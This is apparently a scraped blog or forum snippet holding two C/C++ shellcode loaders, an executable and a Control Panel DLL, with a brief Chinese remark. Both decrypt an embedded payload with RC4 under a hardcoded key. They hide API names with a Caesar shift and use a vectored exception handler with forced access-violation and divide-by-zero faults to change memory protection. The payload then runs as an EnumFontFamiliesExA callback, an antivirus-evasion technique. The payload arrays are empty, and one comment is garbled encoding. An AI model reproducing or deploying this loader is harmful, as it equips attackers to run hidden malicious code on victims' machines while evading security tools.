#includeDWORD test = NULL; DWORD oldflag = NULL; LPVOID ShellAddr = NULL; DWORD Protect = 0x01; LOGFonTA lf; HDC dc; typedef PVOID(NTAPI* FnAddVectoredExceptionHandler)(ULONG, _EXCEPTION_POINTERS*); FnAddVectoredExceptionHandler MyAddVectoredExceptionHandler; unsigned char en_bin[] = { }; DWORD len = 893; char* decrypt(const char* string, short shift) { size_t len = strlen(string); unsigned short i; char* dec = NULL; dec = (char*)calloc(len + 1, sizeof(char)); for (i = 0; i < len; i++) { char c = string[i]; int c_int = (int)c; if (!isalpha(c_int)) { dec[i] = string[i]; continue; } if (isupper(c_int)) { dec[i] = (((c_int - 'A') + shift) % 26) + 'A'; if (dec[i] < 'A') { dec[i] = 'Z' + 1 - ('A' - dec[i]); } } else { dec[i] = (((c_int - 'a') + shift) % 26) + 'a'; if (dec[i] < 'a') { dec[i] = 'z' + 1 - ('a' - dec[i]); } } } return dec; } BOOL DecryptShellcode() { BOOL bSuccess = TRUE; HCRYPTKEY hCryptoKey; HCRYPTHASH hCryptHash; HCRYPTPROV hCryptoProv; DWORD dwLen = 10; bSuccess = CryptAcquireContextW(&hCryptoProv, NULL, L"Microsoft Enhanced RSA and AES Cryptographic Provider", PROV_RSA_AES, CRYPT_VERIFYCONTEXT); if (!bSuccess) { goto CLEANUP; } bSuccess = CryptCreateHash(hCryptoProv, ((4 << 13 | (0) | 12)), 0, 0, &hCryptHash); if (!bSuccess) { goto CLEANUP; } bSuccess = CryptHashData(hCryptHash,(BYTE *)"qwe123qaz?", dwLen, 0);//修改你的密钥 if (!bSuccess) { goto CLEANUP; } bSuccess = CryptDeriveKey(hCryptoProv, CALG_RC4, hCryptHash, 0, &hCryptoKey); if (!bSuccess) { goto CLEANUP; } bSuccess = CryptDecrypt(hCryptoKey, NULL, FALSE, 0, (BYTE *)en_bin, &len); if (!bSuccess) { goto CLEANUP; } goto CLEANUP; CLEANUP: CryptReleaseContext(hCryptoProv, 0); CryptDestroyKey(hCryptoKey); CryptDestroyHash(hCryptHash); return bSuccess; } LONG NTAPI VEH(PEXCEPTION_POINTERS pExcepInfo) { if (pExcepInfo->ExceptionRecord->ExceptionCode == EXCEPTION_ACCESS_VIOLATION) { //pExcepInfo->ContextRecord->Rip = pExcepInfo->ContextRecord->Rip - 0x24; //pExcepInfo->ContextRecord->Rip = pExcepInfo->ContextRecord->Rip - 0x27; pExcepInfo->ContextRecord->Rip = (DWORD)&memcpy; pExcepInfo->ContextRecord->Rcx = (DWORD)ShellAddr; pExcepInfo->ContextRecord->Rdx = (DWORD)en_bin; pExcepInfo->ContextRecord->R8 = len; VirtualProtect(ShellAddr, len, PAGE_READWRITE, &test); DecryptShellcode(); return EXCEPTION_CONTINUE_EXECUTION; } else if (EXCEPTION_INT_DIVIDE_BY_ZERO) { pExcepInfo->ContextRecord->Rcx = 123; VirtualProtect(ShellAddr, len, PAGE_EXECUTE_READ, &oldflag); EnumFontFamiliesExA(dc, &lf, (FONTENUMPROCA)ShellAddr, NULL, NULL); return EXCEPTION_CONTINUE_EXECUTION; } return EXCEPTION_CONTINUE_SEARCH; } int main(int argc,char* argv) { HMODULE hModule = LoadLibraryA(decrypt("pjwsjq32.iqq", -5)); MyAddVectoredExceptionHandler = (FnAddVectoredExceptionHandler)GetProcAddress(hModule, decrypt("FiiAjhytwjiJchjuyntsMfsiqjw", -5)); MyAddVectoredExceptionHandler(0, (_EXCEPTION_POINTERS*)&VEH); ShellAddr = VirtualAlloc(NULL, len, MEM_RESERVE | MEM_COMMIT, Protect); memcpy(ShellAddr, en_bin, len); memset(en_bin,0,len); lf = { 0 }; lf.lfCharSet = DEFAULT_CHARSET; dc = GetDC(NULL); int c = 123 / 0; VirtualFree(ShellAddr, len, MEM_RELEASE); return 0; }
这就有点脱了裤子放屁了,但是可以跑起来 #includeHANDLE hThread = NULL; DWORD test = NULL; DWORD oldflag = NULL; LPVOID ShellAddr = NULL; DWORD Protect = 0x01; LOGFonTA lf; HDC dc; int c; unsigned char en_bin[] = { }; DWORD len = 892; BOOL DecryptShellcode() { BOOL bSuccess = TRUE; HCRYPTKEY hCryptoKey; HCRYPTHASH hCryptHash; HCRYPTPROV hCryptoProv; DWORD dwLen = 10; bSuccess = CryptAcquireContextW(&hCryptoProv, NULL, L"Microsoft Enhanced RSA and AES Cryptographic Provider", PROV_RSA_AES, CRYPT_VERIFYCONTEXT); if (!bSuccess) { goto CLEANUP; } bSuccess = CryptCreateHash(hCryptoProv, ((4 << 13 | (0) | 12)), 0, 0, &hCryptHash); if (!bSuccess) { goto CLEANUP; } bSuccess = CryptHashData(hCryptHash,(BYTE *)"qwe123qaz?", dwLen, 0);//ÐÞ¸ÄÄãµÄÃÜÔ¿ if (!bSuccess) { goto CLEANUP; } bSuccess = CryptDeriveKey(hCryptoProv, CALG_RC4, hCryptHash, 0, &hCryptoKey); if (!bSuccess) { goto CLEANUP; } bSuccess = CryptDecrypt(hCryptoKey, NULL, FALSE, 0, (BYTE *)en_bin, &len); if (!bSuccess) { goto CLEANUP; } goto CLEANUP; CLEANUP: CryptReleaseContext(hCryptoProv, 0); CryptDestroyKey(hCryptoKey); CryptDestroyHash(hCryptHash); return bSuccess; } LONG NTAPI VEH(PEXCEPTION_POINTERS pExcepInfo) { if (pExcepInfo->ExceptionRecord->ExceptionCode == EXCEPTION_ACCESS_VIOLATION) { VirtualProtect(ShellAddr, len, PAGE_READWRITE, &test); DecryptShellcode(); return EXCEPTION_CONTINUE_EXECUTION; } else if (EXCEPTION_INT_DIVIDE_BY_ZERO) { pExcepInfo->ContextRecord->Rcx = 123; VirtualProtect(ShellAddr, len, PAGE_EXECUTE_READ, &oldflag); EnumFontFamiliesExA(dc, &lf, (FONTENUMPROCA)ShellAddr, NULL, NULL); return EXCEPTION_CONTINUE_EXECUTION; } return EXCEPTION_CONTINUE_SEARCH; } extern "C" __declspec(dllexport) LONG Cplapplet(HWND hwndCpl,UINT msg,LPARAM lParam1,LPARAM lParam2) { AddVectoredExceptionHandler(1, (PVECTORED_EXCEPTION_HANDLER)&VEH); ShellAddr = VirtualAlloc(NULL, len, MEM_RESERVE | MEM_COMMIT, Protect); memcpy(ShellAddr, en_bin, len); memset(ShellAddr,0,len); memcpy(ShellAddr, en_bin, len); memset(en_bin,0,len); lf = { 0 }; lf.lfCharSet = DEFAULT_CHARSET; dc = GetDC(NULL); c = 123/0; VirtualFree(ShellAddr, len, MEM_RELEASE); return 0; } BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) { switch (ul_reason_for_call) { case DLL_PROCESS_ATTACH: case DLL_PROCESS_DETACH: case DLL_THREAD_ATTACH: case DLL_THREAD_DETACH: break; } return TRUE; }
VEH HOOK
